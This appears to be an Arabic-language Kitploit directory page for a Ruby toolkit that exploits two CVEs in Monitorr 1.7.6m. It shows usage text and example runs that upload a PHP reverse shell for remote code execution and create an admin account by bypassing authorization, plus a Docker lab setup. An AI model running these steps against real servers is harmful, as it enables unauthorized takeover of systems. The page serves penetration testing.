Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
monitorr-exploit-toolkit — Multiple exploits for Monitorr | Kitploit
أدوات/GitHubGitHub/sec-it/monitorr-exploit-toolkit
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubsec-it/monitorr-exploit-toolkit

monitorr-exploit-toolkit

Multiple exploits for Monitorr

عرض المستودع
101منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مجموعة أدوات استغلال Monitorr

  • RCE عبر رفع ملف غير آمن (صدفة عكسية PHP، webshell، إلخ.)
  • إنشاء حساب مسؤول عبر تجاوز التفويض
  • تسريب معلومات تقنية: إصدار Monitorr، إصدار PHP، إصدار النظام والنواة، إعدادات PHP، إلخ.

استغلال لـ CVE-2020-28872 وCVE-2020-28871.

[PacketStorm]

الاستخدام

root@kitploit:~
$ ruby exploit.rb -h
Monitorr-Exploit

Usage:
  exploit.rb upload <url> <file> [--debug]
  exploit.rb create <url> <user> <pass> <email> [--debug]
  exploit.rb version <url> [--debug]
  exploit.rb phpinfo <url> [--debug]
  exploit.rb -h | --help

upload:       Upload a file (RCE via unrestricted file upload)
version:      Try to fetch Monitorr version
phpinfo:      Extract main phpinfo() information (Information leakage)
create:       Create an administrator account (Authorization bypass)

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <file>      File to be uploaded
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb upload http://example.org revshell.php
  exploit.rb create https://example.org:8080/monitorr/ noraj password '[email protected]'
  exploit.rb version https://example.org:7000/

أمثلة

رفع صدفة عكسية:

root@kitploit:~
$ ruby exploit.rb upload http://localhost:7000/ shell.php
[+] File uploaded:
http://localhost:7000//assets/data/usrimg/shell.php

إنشاء حساب مسؤول:

root@kitploit:~
$ ruby exploit.rb create http://localhost:7000/ noraj20 password '[email protected]'
[+] User created
Username: noraj20
Email: [email protected]
Password: password

الحصول على إصدار Monitorr:

root@kitploit:~
$ ruby exploit.rb version http://localhost:7000/
1.7.6m

الحصول على phpinfp():

root@kitploit:~
$ ruby exploit.rb phpinfo http://localhost:7000/
System: Linux f0ded2053dda 5.12.12-zen1-1-zen #1 ZEN SMP PREEMPT Fri, 18 Jun 2021 21:59:24 +0000 x86_64 
PHP version: 7.1.17 
disable_functions: no value</i>
open_basedir: no value</i>

Full phpinfo() location: http://localhost:7000//assets/php/phpinfo.php

المتطلبات

  • httpx
  • docopt.rb

مثال باستخدام gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

نشر البرنامج المعرّض للخطر باستخدام Docker

تحذير: هذا الإعداد بالطبع غير مناسب للاستخدام في الإنتاج!

root@kitploit:~
$ sudo docker-compose up

قم بإعداد / تهيئة التطبيق على http://127.0.0.1:7000/monitorr/settings.php.

القيود

  • الرفع: يجب أن يحتوي الملف المرفوع على بايت سحري لصورة (مثل GIF) لمطابقة getimagesize (الكود)
  • الإنشاء: يجب أن يكون طول كلمة المرور المستخدمة أثناء إنشاء الحساب >= 6 أحرف (الحد الأدنى للتطبيق)

المراجع

  • البرنامج المستهدف: Monitorr
    • المصدر: https://github.com/Monitorr/Monitorr/
    • دوكر: https://hub.docker.com/r/monitorr/monitorr/
    • الإصدار المعرّض للخطر: 1.7.6m

هذه إعادة كتابة أفضل ودمج لـ EDB-48981 (CVE-2020-28872) وEDB-48980 (CVE-2020-28871) مع وظائف إضافية.

تم اكتشاف ثغرات الرفع وإنشاء حساب المسؤول بواسطة Lyhin's Lab. وتم اكتشاف تسريب phpinfo وإصدار Monitorr بواسطة Alexandre ZANNI aka noraj.

تحليل الاستغلال والثغرة الأصليين:

  • كيف يعمل الاختراق بالصندوق الأبيض: تجاوز التفويض وتنفيذ التعليمات البرمجية عن بُعد في Monitorr 1.7.6
تنزيل الأداة